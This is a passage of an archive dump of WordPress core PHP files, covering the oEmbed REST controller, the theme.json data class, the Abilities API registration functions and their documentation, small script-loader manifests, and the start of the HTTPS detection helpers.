function wp_update_https_migration_required( $old_url, $new_url ) {
	// Do nothing if WordPress is being installed.
	if ( wp_installing() ) {
		return;
	}

	// Delete/reset the option if the new URL is not the HTTPS version of the old URL.
	if ( untrailingslashit( (string) $old_url ) !== str_replace( 'https://', 'http://', untrailingslashit( (string) $new_url ) ) ) {
		delete_option( 'https_migration_required' );
		return;
	}

	// If this is a fresh site, there is no content to migrate, so do not require migration.
	$https_migration_required = get_option( 'fresh_site' ) ? false : true;

	update_option( 'https_migration_required', $https_migration_required );
}
script-loader-react-refresh-runtime-20260605012803.php000066600000000124152241256320015621 0ustar00<?php return array('dependencies' => array(), 'version' => '8f1acdfb845f670b0ef2');
class-wp-theme-json-data.php000066600000003421152241256320011772 0ustar00<?php
/**
 * WP_Theme_JSON_Data class
 *
 * @package WordPress
 * @subpackage Theme
 * @since 6.1.0
 */

/**
 * Class to provide access to update a theme.json structure.
 */
#[AllowDynamicProperties]
class WP_Theme_JSON_Data {

	/**
	 * Container of the data to update.
	 *
	 * @since 6.1.0
	 * @var WP_Theme_JSON
	 */
	private $theme_json = null;

	/**
	 * The origin of the data: default, theme, user, etc.
	 *
	 * @since 6.1.0
	 * @var string
	 */
	private $origin = '';

	/**
	 * Constructor.
	 *
	 * @since 6.1.0
	 *
	 * @link https://developer.wordpress.org/block-editor/reference-guides/theme-json-reference/
	 *
	 * @param array  $data   Array following the theme.json specification.
	 * @param string $origin The origin of the data: default, theme, user.
	 */
	public function __construct( $data = array( 'version' => WP_Theme_JSON::LATEST_SCHEMA ), $origin = 'theme' ) {
		$this->origin     = $origin;
		$this->theme_json = new WP_Theme_JSON( $data, $this->origin );
	}

	/**
	 * Updates the theme.json with the the given data.
	 *
	 * @since 6.1.0
	 *
	 * @param array $new_data Array following the theme.json specification.
	 *
	 * @return WP_Theme_JSON_Data The own instance with access to the modified data.
	 */
	public function update_with( $new_data ) {
		$this->theme_json->merge( new WP_Theme_JSON( $new_data, $this->origin ) );
		return $this;
	}

	/**
	 * Returns an array containing the underlying data
	 * following the theme.json specification.
	 *
	 * @since 6.1.0
	 *
	 * @return array
	 */
	public function get_data() {
		return $this->theme_json->get_raw_data();
	}

	/**
	 * Returns theme JSON object.
	 *
	 * @since 6.6.0
	 *
	 * @return WP_Theme_JSON The theme JSON structure stored in this data object.
	 */
	public function get_theme_json() {
		return $this->theme_json;
	}
}
class-wp-oembed-controller.php000066600000015371152241256320012435 0ustar00<?php
/**
 * WP_oEmbed_Controller class, used to provide an oEmbed endpoint.
 *
 * @package WordPress
 * @subpackage Embeds
 * @since 4.4.0
 */

/**
 * oEmbed API endpoint controller.
 *
 * Registers the REST API route and delivers the response data.
 * The output format (XML or JSON) is handled by the REST API.
 *
 * @since 4.4.0
 */
#[AllowDynamicProperties]
final class WP_oEmbed_Controller {
	/**
	 * Register the oEmbed REST API route.
	 *
	 * @since 4.4.0
	 */
	public function register_routes() {
		/**
		 * Filters the maxwidth oEmbed parameter.
		 *
		 * @since 4.4.0
		 *
		 * @param int $maxwidth Maximum allowed width. Default 600.
		 */
		$maxwidth = apply_filters( 'oembed_default_width', 600 );

		register_rest_route(
			'oembed/1.0',
			'/embed',
			array(
				array(
					'methods'             => WP_REST_Server::READABLE,
					'callback'            => array( $this, 'get_item' ),
					'permission_callback' => '__return_true',
					'args'                => array(
						'url'      => array(
							'description' => __( 'The URL of the resource for which to fetch oEmbed data.' ),
							'required'    => true,
							'type'        => 'string',
							'format'      => 'uri',
						),
						'format'   => array(
							'default'           => 'json',
							'sanitize_callback' => 'wp_oembed_ensure_format',
						),
						'maxwidth' => array(
							'default'           => $maxwidth,
							'sanitize_callback' => 'absint',
						),
					),
				),
			)
		);

		register_rest_route(
			'oembed/1.0',
			'/proxy',
			array(
				array(
					'methods'             => WP_REST_Server::READABLE,
					'callback'            => array( $this, 'get_proxy_item' ),
					'permission_callback' => array( $this, 'get_proxy_item_permissions_check' ),
					'args'                => array(
						'url'       => array(
							'description' => __( 'The URL of the resource for which to fetch oEmbed data.' ),
							'required'    => true,
							'type'        => 'string',
							'format'      => 'uri',
						),
						'format'    => array(
							'description' => __( 'The oEmbed format to use.' ),
							'type'        => 'string',
							'default'     => 'json',
							'enum'        => array(
								'json',
								'xml',
							),
						),
						'maxwidth'  => array(
							'description'       => __( 'The maximum width of the embed frame in pixels.' ),
							'type'              => 'integer',
							'default'           => $maxwidth,
							'sanitize_callback' => 'absint',
						),
						'maxheight' => array(
							'description'       => __( 'The maximum height of the embed frame in pixels.' ),
							'type'              => 'integer',
							'sanitize_callback' => 'absint',
						),
						'discover'  => array(
							'description' => __( 'Whether to perform an oEmbed discovery request for unsanctioned providers.' ),
							'type'        => 'boolean',
							'default'     => true,
						),
					),
				),
			)
		);
	}

	/**
	 * Callback for the embed API endpoint.
	 *
	 * Returns the JSON object for the post.
	 *
	 * @since 4.4.0
	 *
	 * @param WP_REST_Request $request Full data about the request.
	 * @return array|WP_Error oEmbed response data or WP_Error on failure.
	 */
	public function get_item( $request ) {
		$post_id = url_to_postid( $request['url'] );

		/**
		 * Filters the determined post ID.
		 *
		 * @since 4.4.0
		 *
		 * @param int    $post_id The post ID.
		 * @param string $url     The requested URL.
		 */
		$post_id = apply_filters( 'oembed_request_post_id', $post_id, $request['url'] );

		$data = get_oembed_response_data( $post_id, $request['maxwidth'] );

		if ( ! $data ) {
			return new WP_Error( 'oembed_invalid_url', get_status_header_desc( 404 ), array( 'status' => 404 ) );
		}

		return $data;
	}

	/**
	 * Checks if current user can make a proxy oEmbed request.
	 *
	 * @since 4.8.0
	 *
	 * @return true|WP_Error True if the request has read access, WP_Error object otherwise.
	 */
	public function get_proxy_item_permissions_check() {
		if ( ! current_user_can( 'edit_posts' ) ) {
			return new WP_Error( 'rest_forbidden', __( 'Sorry, you are not allowed to make proxied oEmbed requests.' ), array( 'status' => rest_authorization_required_code() ) );
		}
		return true;
	}

	/**
	 * Callback for the proxy API endpoint.
	 *
	 * Returns the JSON object for the proxied item.
	 *
	 * @since 4.8.0
	 *
	 * @see WP_oEmbed::get_html()
	 * @global WP_Embed   $wp_embed   WordPress Embed object.
	 * @global WP_Scripts $wp_scripts
	 *
	 * @param WP_REST_Request $request Full data about the request.
	 * @return object|WP_Error oEmbed response data or WP_Error on failure.
	 */
	public function get_proxy_item( $request ) {
		global $wp_embed, $wp_scripts;

		$args = $request->get_params();

		// Serve oEmbed data from cache if set.
		unset( $args['_wpnonce'] );
		$cache_key = 'oembed_' . md5( serialize( $args ) );
		$data      = get_transient( $cache_key );
		if ( ! empty( $data ) ) {
			return $data;
		}

		$url = $request['url'];
		unset( $args['url'] );

		// Copy maxwidth/maxheight to width/height since WP_oEmbed::fetch() uses these arg names.
		if ( isset( $args['maxwidth'] ) ) {
			$args['width'] = $args['maxwidth'];
		}
		if ( isset( $args['maxheight'] ) ) {
			$args['height'] = $args['maxheight'];
		}

		// Short-circuit process for URLs belonging to the current site.
		$data = get_oembed_response_data_for_url( $url, $args );

		if ( $data ) {
			return $data;
		}

		$data = _wp_oembed_get_object()->get_data( $url, $args );

		if ( false === $data ) {
			// Try using a classic embed, instead.
			/* @var WP_Embed $wp_embed */
			$html = $wp_embed->get_embed_handler_html( $args, $url );

			if ( $html ) {
				// Check if any scripts were enqueued by the shortcode, and include them in the response.
				$enqueued_scripts = array();

				foreach ( $wp_scripts->queue as $script ) {
					$enqueued_scripts[] = $wp_scripts->registered[ $script ]->src;
				}

				return (object) array(
					'provider_name' => __( 'Embed Handler' ),
					'html'          => $html,
					'scripts'       => $enqueued_scripts,
				);
			}

			return new WP_Error( 'oembed_invalid_url', get_status_header_desc( 404 ), array( 'status' => 404 ) );
		}

		/** This filter is documented in wp-includes/class-wp-oembed.php */
		$data->html = apply_filters( 'oembed_result', _wp_oembed_get_object()->data2html( (object) $data, $url ), $url, $args );

		/**
		 * Filters the oEmbed TTL value (time to live).
		 *
		 * Similar to the {@see 'oembed_ttl'} filter, but for the REST API
		 * oEmbed proxy endpoint.
		 *
		 * @since 4.8.0
		 *
		 * @param int    $time    Time to live (in seconds).
		 * @param string $url     The attempted embed URL.
		 * @param array  $args    An array of embed request arguments.
		 */
		$ttl = apply_filters( 'rest_oembed_ttl', DAY_IN_SECONDS, $url, $args );

		set_transient( $cache_key, $data, $ttl );

		return $data;
	}
}
script-loader-react-refresh-runtime.min.php000066600000000124152241256320015023 0ustar00<?php return array('dependencies' => array(), 'version' => '8f1acdfb845f670b0ef2');
script-modules-packages.min.php000066600000003544152241256320012601 0ustar00<?php return array('interactivity/index.min.js' => array('dependencies' => array(), 'version' => '66c613f68580994bb00a', 'type' => 'module'), 'interactivity/debug.min.js' => array('dependencies' => array(), 'version' => 'c8e2d133ebe0f55341a1', 'type' => 'module'), 'interactivity-router/index.min.js' => array('dependencies' => array('@wordpress/interactivity', array('id' => '@wordpress/a11y', 'import' => 'dynamic')), 'version' => 'ae0663e15cc8d4b56150', 'type' => 'module'), 'a11y/index.min.js' => array('dependencies' => array(), 'version' => 'b7d06936b8bc23cff2ad', 'type' => 'module'), 'block-library/accordion/view.min.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => 'ea83272e31d6958353ff', 'type' => 'module'), 'block-library/file/view.min.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => 'f9665632b48682075277', 'type' => 'module'), 'block-library/form/view.min.js' => array('dependencies' => array(), 'version' => 'baaf25398238b4f2a821', 'type' => 'module'), 'block-library/image/view.min.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => '292ec2cc397d10d98f6a', 'type' => 'module'), 'block-library/navigation/view.min.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => 'b0f909c3ec791c383210', 'type' => 'module'), 'block-library/query/view.min.js' => array('dependencies' => array('@wordpress/interactivity', array('id' => '@wordpress/interactivity-router', 'import' => 'dynamic')), 'version' => 'f55e93a1ad4806e91785', 'type' => 'module'), 'block-library/search/view.min.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => '94fc611a7464b5de290a', 'type' => 'module'), 'block-editor/utils/fit-text-frontend.min.js' => array('dependencies' => array('@wordpress/interactivity'), 'version' => '14403d27701735d22108', 'type' => 'module'));
abilities-api.php000066600000057461152241256320010014 0ustar00<?php
/**
 * Abilities API: core functions for registering and managing abilities.
 *
 * The Abilities API provides a unified, extensible framework for registering
 * and executing discrete capabilities within WordPress. An "ability" is a
 * self-contained unit of functionality with defined inputs, outputs, permissions,
 * and execution logic.
 *
 * ## Overview
 *
 * The Abilities API enables developers to:
 *
 *  - Register custom abilities with standardized interfaces.
 *  - Define permission checks and execution callbacks.
 *  - Organize abilities into logical categories.
 *  - Validate inputs and outputs using JSON Schema.
 *  - Expose abilities through the REST API.
 *
 * ## Working with Abilities
 *
 * Abilities must be registered on the `wp_abilities_api_init` action hook.
 * Attempting to register an ability outside of this hook will fail and
 * trigger a `_doing_it_wrong()` notice.

 * Example:
 *
 *     function my_plugin_register_abilities(): void {
 *         wp_register_ability(
 *             'my-plugin/export-users',
 *             array(
 *                 'label'               => __( 'Export Users', 'my-plugin' ),
 *                 'description'         => __( 'Exports user data to CSV format.', 'my-plugin' ),
 *                 'category'            => 'data-export',
 *                 'execute_callback'    => 'my_plugin_export_users',
 *                 'permission_callback' => function(): bool {
 *                     return current_user_can( 'export' );
 *                 },
 *                 'input_schema'        => array(
 *                     'type'        => 'string',
 *                     'enum'        => array( 'subscriber', 'contributor', 'author', 'editor', 'administrator' ),
 *                     'description' => __( 'Limits the export to users with this role.', 'my-plugin' ),
 *                     'required'    => false,
 *                 ),
 *                 'output_schema'       => array(
 *                     'type'        => 'string',
 *                     'description' => __( 'User data in CSV format.', 'my-plugin' ),
 *                     'required'    => true,
 *                 ),
 *                 'meta'                => array(
 *                     'show_in_rest' => true,
 *                 ),
 *             )
 *         );
 *     }
 *     add_action( 'wp_abilities_api_init', 'my_plugin_register_abilities' );
 *
 * Once registered, abilities can be checked, retrieved, and managed:
 *
 *     // Checks if an ability is registered, and prints its label.
 *     if ( wp_has_ability( 'my-plugin/export-users' ) ) {
 *         $ability = wp_get_ability( 'my-plugin/export-users' );
 *
 *         echo $ability->get_label();
 *     }
 *
 *     // Gets all registered abilities.
 *     $all_abilities = wp_get_abilities();
 *
 *     // Unregisters when no longer needed.
 *     wp_unregister_ability( 'my-plugin/export-users' );
 *
 * ## Best Practices
 *
 *  - Always register abilities on the `wp_abilities_api_init` hook.
 *  - Use namespaced ability names to prevent conflicts.
 *  - Implement robust permission checks in permission callbacks.
 *  - Provide an `input_schema` to ensure data integrity and document expected inputs.
 *  - Define an `output_schema` to describe return values and validate responses.
 *  - Return `WP_Error` objects for failures rather than throwing exceptions.
 *  - Use internationalization functions for all user-facing strings.
 *
 * @package WordPress
 * @subpackage Abilities_API
 * @since 6.9.0
 */

declare( strict_types = 1 );

/**
 * Registers a new ability using the Abilities API. It requires three steps:
 *
 *  1. Hook into the `wp_abilities_api_init` action.
 *  2. Call `wp_register_ability()` with a namespaced name and configuration.
 *  3. Provide execute and permission callbacks.
 *
 * Example:
 *
 *     function my_plugin_register_abilities(): void {
 *         wp_register_ability(
 *             'my-plugin/analyze-text',
 *             array(
 *                 'label'               => __( 'Analyze Text', 'my-plugin' ),
 *                 'description'         => __( 'Performs sentiment analysis on provided text.', 'my-plugin' ),
 *                 'category'            => 'text-processing',
 *                 'input_schema'        => array(
 *                     'type'        => 'string',
 *                     'description' => __( 'The text to be analyzed.', 'my-plugin' ),
 *                     'minLength'   => 10,
 *                     'required'    => true,
 *                 ),
 *                 'output_schema'       => array(
 *                     'type'        => 'string',
 *                     'enum'        => array( 'positive', 'negative', 'neutral' ),
 *                     'description' => __( 'The sentiment result: positive, negative, or neutral.', 'my-plugin' ),
 *                     'required'    => true,
 *                 ),
 *                 'execute_callback'    => 'my_plugin_analyze_text',
 *                 'permission_callback' => 'my_plugin_can_analyze_text',
 *                 'meta'                => array(
 *                     'annotations'   => array(
 *                         'readonly' => true,
 *                     ),
 *                     'show_in_rest' => true,
 *                 ),
 *             )
 *         );
 *     }
 *     add_action( 'wp_abilities_api_init', 'my_plugin_register_abilities' );
 *
 * ### Naming Conventions
 *
 * Ability names must follow these rules:
 *
 *  - Include a namespace prefix (e.g., `my-plugin/my-ability`).
 *  - Use only lowercase alphanumeric characters, dashes, and forward slashes.
 *  - Use descriptive, action-oriented names (e.g., `process-payment`, `generate-report`).
 *
 * ### Categories
 *
 * Abilities must be organized into categories. Ability categories provide better
 * discoverability and must be registered before the abilities that reference them:
 *
 *     function my_plugin_register_categories(): void {
 *         wp_register_ability_category(
 *             'text-processing',
 *             array(
 *                 'label'       => __( 'Text Processing', 'my-plugin' ),
 *                 'description' => __( 'Abilities for analyzing and transforming text.', 'my-plugin' ),
 *             )
 *         );
 *     }
 *     add_action( 'wp_abilities_api_categories_init', 'my_plugin_register_categories' );
 *
 * ### Input and Output Schemas
 *
 * Schemas define the expected structure, type, and constraints for ability inputs
 * and outputs using JSON Schema syntax. They serve two critical purposes: automatic
 * validation of data passed to and returned from abilities, and self-documenting
 * API contracts for developers.
 *
 * WordPress implements a validator based on a subset of the JSON Schema Version 4
 * specification (https://json-schema.org/specification-links.html#draft-4).
 * For details on supported JSON Schema properties and syntax, see the
 * related WordPress REST API Schema documentation:
 * https://developer.wordpress.org/rest-api/extending-the-rest-api/schema/#json-schema-basics
 *
 * Defining schemas is mandatory when there is a value to pass or return.
 * They ensure data integrity, improve developer experience, and enable
 * better documentation:
 *
 *     'input_schema' => array(
 *         'type'        => 'string',
 *         'description' => __( 'The text to be analyzed.', 'my-plugin' ),
 *         'minLength'   => 10,
 *         'required'    => true,
 *     ),
 *     'output_schema'       => array(
 *         'type'        => 'string',
 *         'enum'        => array( 'positive', 'negative', 'neutral' ),
 *         'description' => __( 'The sentiment result: positive, negative, or neutral.', 'my-plugin' ),
 *         'required'    => true,
 *     ),
 *
 * ### Callbacks
 *
 * #### Execute Callback
 *
 * The execute callback performs the ability's core functionality. It receives
 * optional input data and returns either a result or `WP_Error` on failure.
 *
 *     function my_plugin_analyze_text( string $input ): string|WP_Error {
 *         $score = My_Plugin::perform_sentiment_analysis( $input );
 *         if ( is_wp_error( $score ) ) {
 *             return $score;
 *         }
 *         return My_Plugin::interpret_sentiment_score( $score );
 *     }
 *
 * #### Permission Callback
 *
 * The permission callback determines whether the ability can be executed.
 * It receives the same input as the execute callback and must return a
 * boolean or `WP_Error`. Common use cases include checking user capabilities,
 * validating API keys, or verifying system state:
 *
 *     function my_plugin_can_analyze_text( string $input ): bool|WP_Error {
 *         return current_user_can( 'edit_posts' );
 *     }
 *
 * ### REST API Integration
 *
 * Abilities can be exposed through the REST API by setting `show_in_rest`
 * to `true` in the meta configuration:
 *
 *     'meta' => array(
 *         'show_in_rest' => true,
 *     ),
 *
 * This allows abilities to be invoked via HTTP requests to the WordPress REST API.
 *
 * @since 6.9.0
 *
 * @see WP_Abilities_Registry::register()
 * @see wp_register_ability_category()
 * @see wp_unregister_ability()
 *
 * @param string               $name The name of the ability. Must be a namespaced string containing
 *                                   a prefix, e.g., `my-plugin/my-ability`. Can only contain lowercase
 *                                   alphanumeric characters, dashes, and forward slashes.
 * @param array<string, mixed> $args {
 *     An associative array of arguments for configuring the ability.
 *
 *     @type string               $label               Required. The human-readable label for the ability.
 *     @type string               $description         Required. A detailed description of what the ability does
 *                                                     and when it should be used.
 *     @type string               $category            Required. The ability category slug this ability belongs to.
 *                                                     The ability category must be registered via `wp_register_ability_category()`
 *                                                     before registering the ability.
 *     @type callable             $execute_callback    Required. A callback function to execute when the ability is invoked.
 *                                                     Receives optional mixed input data and must return either a result
 *                                                     value (any type) or a `WP_Error` object on failure.
 *     @type callable             $permission_callback Required. A callback function to check permissions before execution.
 *                                                     Receives optional mixed input data (same as `execute_callback`) and
 *                                                     must return `true`/`false` for simple checks, or `WP_Error` for
 *                                                     detailed error responses.
 *     @type array<string, mixed> $input_schema        Optional. JSON Schema definition for validating the ability's input.
 *                                                     Must be a valid JSON Schema object defining the structure and
 *                                                     constraints for input data. Used for automatic validation and
 *                                                     API documentation.
 *     @type array<string, mixed> $output_schema       Optional. JSON Schema definition for the ability's output.
 *                                                     Describes the structure of successful return values from
 *                                                     `execute_callback`. Used for documentation and validation.
 *     @type array<string, mixed> $meta                {
 *         Optional. Additional metadata for the ability.
 *
 *         @type array<string, bool|null> $annotations  {
 *             Optional. Semantic annotations describing the ability's behavioral characteristics.
 *             These annotations are hints for tooling and documentation.
 *
 *             @type bool|null $readonly    Optional. If true, the ability does not modify its environment.
 *             @type bool|null $destructive Optional. If true, the ability may perform destructive updates to its environment.
 *                                          If false, the ability performs only additive updates.
 *             @type bool|null $idempotent  Optional. If true, calling the ability repeatedly with the same arguments
 *                                          will have no additional effect on its environment.
 *         }
 *         @type bool                     $show_in_rest Optional. Whether to expose this ability in the REST API.
 *                                                      When true, the ability can be invoked via HTTP requests.
 *                                                      Default false.
 *     }
 *     @type string               $ability_class       Optional. Fully-qualified custom class name to instantiate
 *                                                     instead of the default `WP_Ability` class. The custom class
 *                                                     must extend `WP_Ability`. Useful for advanced customization
 *                                                     of ability behavior.
 * }
 * @return WP_Ability|null The registered ability instance on success, `null` on failure.
 */
function wp_register_ability( string $name, array $args ): ?WP_Ability {
	if ( ! doing_action( 'wp_abilities_api_init' ) ) {
		_doing_it_wrong(
			__FUNCTION__,
			sprintf(
				/* translators: 1: wp_abilities_api_init, 2: string value of the ability name. */
				__( 'Abilities must be registered on the %1$s action. The ability %2$s was not registered.' ),
				'<code>wp_abilities_api_init</code>',
				'<code>' . esc_html( $name ) . '</code>'
			),
			'6.9.0'
		);
		return null;
	}

	$registry = WP_Abilities_Registry::get_instance();
	if ( null === $registry ) {
		return null;
	}

	return $registry->register( $name, $args );
}

/**
 * Unregisters an ability from the Abilities API.
 *
 * Removes a previously registered ability from the global registry. Use this to
 * disable abilities provided by other plugins or when an ability is no longer needed.
 *
 * Can be called at any time after the ability has been registered.
 *
 * Example:
 *
 *     if ( wp_has_ability( 'other-plugin/some-ability' ) ) {
 *         wp_unregister_ability( 'other-plugin/some-ability' );
 *     }
 *
 * @since 6.9.0
 *
 * @see WP_Abilities_Registry::unregister()
 * @see wp_register_ability()
 *
 * @param string $name The name of the ability to unregister, including namespace prefix
 *                     (e.g., 'my-plugin/my-ability').
 * @return WP_Ability|null The unregistered ability instance on success, `null` on failure.
 */
function wp_unregister_ability( string $name ): ?WP_Ability {
	$registry = WP_Abilities_Registry::get_instance();
	if ( null === $registry ) {
		return null;
	}

	return $registry->unregister( $name );
}

/**
 * Checks if an ability is registered.
 *
 * Use this for conditional logic and feature detection before attempting to
 * retrieve or use an ability.
 *
 * Example:
 *
 *     // Displays different UI based on available abilities.
 *     if ( wp_has_ability( 'premium-plugin/advanced-export' ) ) {
 *         echo 'Export with Premium Features';
 *     } else {
 *         echo 'Basic Export';
 *     }
 *
 * @since 6.9.0
 *
 * @see WP_Abilities_Registry::is_registered()
 * @see wp_get_ability()
 *
 * @param string $name The name of the ability to check, including namespace prefix
 *                     (e.g., 'my-plugin/my-ability').
 * @return bool `true` if the ability is registered, `false` otherwise.
 */
function wp_has_ability( string $name ): bool {
	$registry = WP_Abilities_Registry::get_instance();
	if ( null === $registry ) {
		return false;
	}

	return $registry->is_registered( $name );
}

/**
 * Retrieves a registered ability.
 *
 * Returns the ability instance for inspection or use. The instance provides access
 * to the ability's configuration, metadata, and execution methods.
 *
 * Example:
 *
 *     // Prints information about a registered ability.
 *     $ability = wp_get_ability( 'my-plugin/export-data' );
 *     if ( $ability ) {
 *         echo $ability->get_label() . ': ' . $ability->get_description();
 *     }
 *
 * @since 6.9.0
 *
 * @see WP_Abilities_Registry::get_registered()
 * @see wp_has_ability()
 *
 * @param string $name The name of the ability, including namespace prefix
 *                     (e.g., 'my-plugin/my-ability').
 * @return WP_Ability|null The registered ability instance, or `null` if not registered.
 */
function wp_get_ability( string $name ): ?WP_Ability {
	$registry = WP_Abilities_Registry::get_instance();
	if ( null === $registry ) {
		return null;
	}

	return $registry->get_registered( $name );
}

/**
 * Retrieves all registered abilities.
 *
 * Returns an array of all ability instances currently registered in the system.
 * Use this for discovery, debugging, or building administrative interfaces.
 *
 * Example:
 *
 *     // Prints information about all available abilities.
 *     $abilities = wp_get_abilities();
 *     foreach ( $abilities as $ability ) {
 *         echo $ability->get_label() . ': ' . $ability->get_description() . "\n";
 *     }
 *
 * @since 6.9.0
 *
 * @see WP_Abilities_Registry::get_all_registered()
 *
 * @return WP_Ability[] An array of registered WP_Ability instances. Returns an empty
 *                     array if no abilities are registered or if the registry is unavailable.
 */
function wp_get_abilities(): array {
	$registry = WP_Abilities_Registry::get_instance();
	if ( null === $registry ) {
		return array();
	}

	return $registry->get_all_registered();
}

/**
 * Registers a new ability category.
 *
 * Ability categories provide a way to organize and group related abilities for better
 * discoverability and management. Ability categories must be registered before abilities
 * that reference them.
 *
 * Ability categories must be registered on the `wp_abilities_api_categories_init` action hook.
 *
 * Example:
 *
 *     function my_plugin_register_categories() {
 *         wp_register_ability_category(
 *             'content-management',
 *             array(
 *                 'label'       => __( 'Content Management', 'my-plugin' ),
 *                 'description' => __( 'Abilities for managing and organizing content.', 'my-plugin' ),
 *             )
 *         );
 *     }
 *     add_action( 'wp_abilities_api_categories_init', 'my_plugin_register_categories' );
 *
 * @since 6.9.0
 *
 * @see WP_Ability_Categories_Registry::register()
 * @see wp_register_ability()
 * @see wp_unregister_ability_category()
 *
 * @param string               $slug The unique slug for the ability category. Must contain only lowercase
 *                                   alphanumeric characters and dashes (e.g., 'data-export').
 * @param array<string, mixed> $args {
 *     An associative array of arguments for the ability category.
 *
 *     @type string               $label       Required. The human-readable label for the ability category.
 *     @type string               $description Required. A description of what abilities in this category do.
 *     @type array<string, mixed> $meta        Optional. Additional metadata for the ability category.
 * }
 * @return WP_Ability_Category|null The registered ability category instance on success, `null` on failure.
 */
function wp_register_ability_category( string $slug, array $args ): ?WP_Ability_Category {
	if ( ! doing_action( 'wp_abilities_api_categories_init' ) ) {
		_doing_it_wrong(
			__FUNCTION__,
			sprintf(
				/* translators: 1: wp_abilities_api_categories_init, 2: ability category slug. */
				__( 'Ability categories must be registered on the %1$s action. The ability category %2$s was not registered.' ),
				'<code>wp_abilities_api_categories_init</code>',
				'<code>' . esc_html( $slug ) . '</code>'
			),
			'6.9.0'
		);
		return null;
	}

	$registry = WP_Ability_Categories_Registry::get_instance();
	if ( null === $registry ) {
		return null;
	}

	return $registry->register( $slug, $args );
}

/**
 * Unregisters an ability category.
 *
 * Removes a previously registered ability category from the global registry. Use this to
 * disable ability categories that are no longer needed.
 *
 * Can be called at any time after the ability category has been registered.
 *
 * Example:
 *
 *     if ( wp_has_ability_category( 'deprecated-category' ) ) {
 *         wp_unregister_ability_category( 'deprecated-category' );
 *     }
 *
 * @since 6.9.0
 *
 * @see WP_Ability_Categories_Registry::unregister()
 * @see wp_register_ability_category()
 *
 * @param string $slug The slug of the ability category to unregister.
 * @return WP_Ability_Category|null The unregistered ability category instance on success, `null` on failure.
 */
function wp_unregister_ability_category( string $slug ): ?WP_Ability_Category {
	$registry = WP_Ability_Categories_Registry::get_instance();
	if ( null === $registry ) {
		return null;
	}

	return $registry->unregister( $slug );
}

/**
 * Checks if an ability category is registered.
 *
 * Use this for conditional logic and feature detection before attempting to
 * retrieve or use an ability category.
 *
 * Example:
 *
 *     // Displays different UI based on available ability categories.
 *     if ( wp_has_ability_category( 'premium-features' ) ) {
 *         echo 'Premium Features Available';
 *     } else {
 *         echo 'Standard Features';
 *     }
 *
 * @since 6.9.0
 *
 * @see WP_Ability_Categories_Registry::is_registered()
 * @see wp_get_ability_category()
 *
 * @param string $slug The slug of the ability category to check.
 * @return bool `true` if the ability category is registered, `false` otherwise.
 */
function wp_has_ability_category( string $slug ): bool {
	$registry = WP_Ability_Categories_Registry::get_instance();
	if ( null === $registry ) {
		return false;
	}

	return $registry->is_registered( $slug );
}

/**
 * Retrieves a registered ability category.
 *
 * Returns the ability category instance for inspection or use. The instance provides access
 * to the ability category's configuration and metadata.
 *
 * Example:
 *
 *     // Prints information about a registered ability category.
 *     $ability_category = wp_get_ability_category( 'content-management' );
 *     if ( $ability_category ) {
 *         echo $ability_category->get_label() . ': ' . $ability_category->get_description();
 *     }
 *
 * @since 6.9.0
 *
 * @see WP_Ability_Categories_Registry::get_registered()
 * @see wp_has_ability_category()
 * @see wp_get_ability_categories()
 *
 * @param string $slug The slug of the ability category.
 * @return WP_Ability_Category|null The ability category instance, or `null` if not registered.
 */
function wp_get_ability_category( string $slug ): ?WP_Ability_Category {
	$registry = WP_Ability_Categories_Registry::get_instance();
	if ( null === $registry ) {
		return null;
	}

	return $registry->get_registered( $slug );
}

/**
 * Retrieves all registered ability categories.
 *
 * Returns an array of all ability category instances currently registered in the system.
 * Use this for discovery, debugging, or building administrative interfaces.
 *
 * Example:
 *
 *     // Prints information about all available ability categories.
 *     $ability_categories = wp_get_ability_categories();
 *     foreach ( $ability_categories as $ability_category ) {
 *         echo $ability_category->get_label() . ': ' . $ability_category->get_description() . "\n";
 *     }
 *
 * @since 6.9.0
 *
 * @see WP_Ability_Categories_Registry::get_all_registered()
 * @see wp_get_ability_category()
 *
 * @return WP_Ability_Category[] An array of registered ability category instances. Returns an empty array
 *                               if no ability categories are registered or if the registry is unavailable.
 */
function wp_get_ability_categories(): array {
	$registry = WP_Ability_Categories_Registry::get_instance();
	if ( null === $registry ) {
		return array();
	}

	return $registry->get_all_registered();
}
script-loader-react-refresh-runtime-20260604235810.php000066600000000124152241256320015625 0ustar00<?php return array('dependencies' => array(), 'version' => '8f1acdfb845f670b0ef2');
https-detection.php000066600000013341152241256320010403 0ustar00<?php
/**
 * HTTPS detection functions.
 *
 * @package WordPress
 * @since 5.7.0
 */

/**
 * Checks whether the website is using HTTPS.
 *
 * This is based on whether both the home and site URL are using HTTPS.
 *
 * @since 5.7.0
 * @see wp_is_home_url_using_https()
 * @see wp_is_site_url_using_https()
 *
 * @return bool True if using HTTPS, false otherwise.
 */
function wp_is_using_https() {
	if ( ! wp_is_home_url_using_https() ) {
		return false;
	}

	return wp_is_site_url_using_https();
}

/**
 * Checks whether the current site URL is using HTTPS.
 *
 * @since 5.7.0
 * @see home_url()
 *
 * @return bool True if using HTTPS, false otherwise.
 */
function wp_is_home_url_using_https() {
	return 'https' === wp_parse_url( home_url(), PHP_URL_SCHEME );
}

/**
 * Checks whether the current site's URL where WordPress is stored is using HTTPS.
 *
 * This checks the URL where WordPress application files (e.g. wp-blog-header.php or the wp-admin/ folder)
 * are accessible.
 *
 * @since 5.7.0
 * @see site_url()
 *
 * @return bool True if using HTTPS, false otherwise.
 */
function wp_is_site_url_using_https() {
	/*
	 * Use direct option access for 'siteurl' and manually run the 'site_url'
	 * filter because `site_url()` will adjust the scheme based on what the
	 * current request is using.
	 */
	/** This filter is documented in wp-includes/link-template.php */
	$site_url = apply_filters( 'site_url', get_option( 'siteurl' ), '', null, null );

	return 'https' === wp_parse_url( $site_url, PHP_URL_SCHEME );
}

/**
 * Checks whether HTTPS is supported for the server and domain.
 *
 * This function makes an HTTP request through `wp_get_https_detection_errors()`
 * to check for HTTPS support. As this process can be resource-intensive,
 * it should be used cautiously, especially in performance-sensitive environments,
 * to avoid potential latency issues.
 *
 * @since 5.7.0
 *
 * @return bool True if HTTPS is supported, false otherwise.
 */
function wp_is_https_supported() {
	$https_detection_errors = wp_get_https_detection_errors();

	// If there are errors, HTTPS is not supported.
	return empty( $https_detection_errors );
}

/**
 * Runs a remote HTTPS request to detect whether HTTPS supported, and stores potential errors.
 *
 * This function checks for HTTPS support by making an HTTP request. As this process can be resource-intensive,
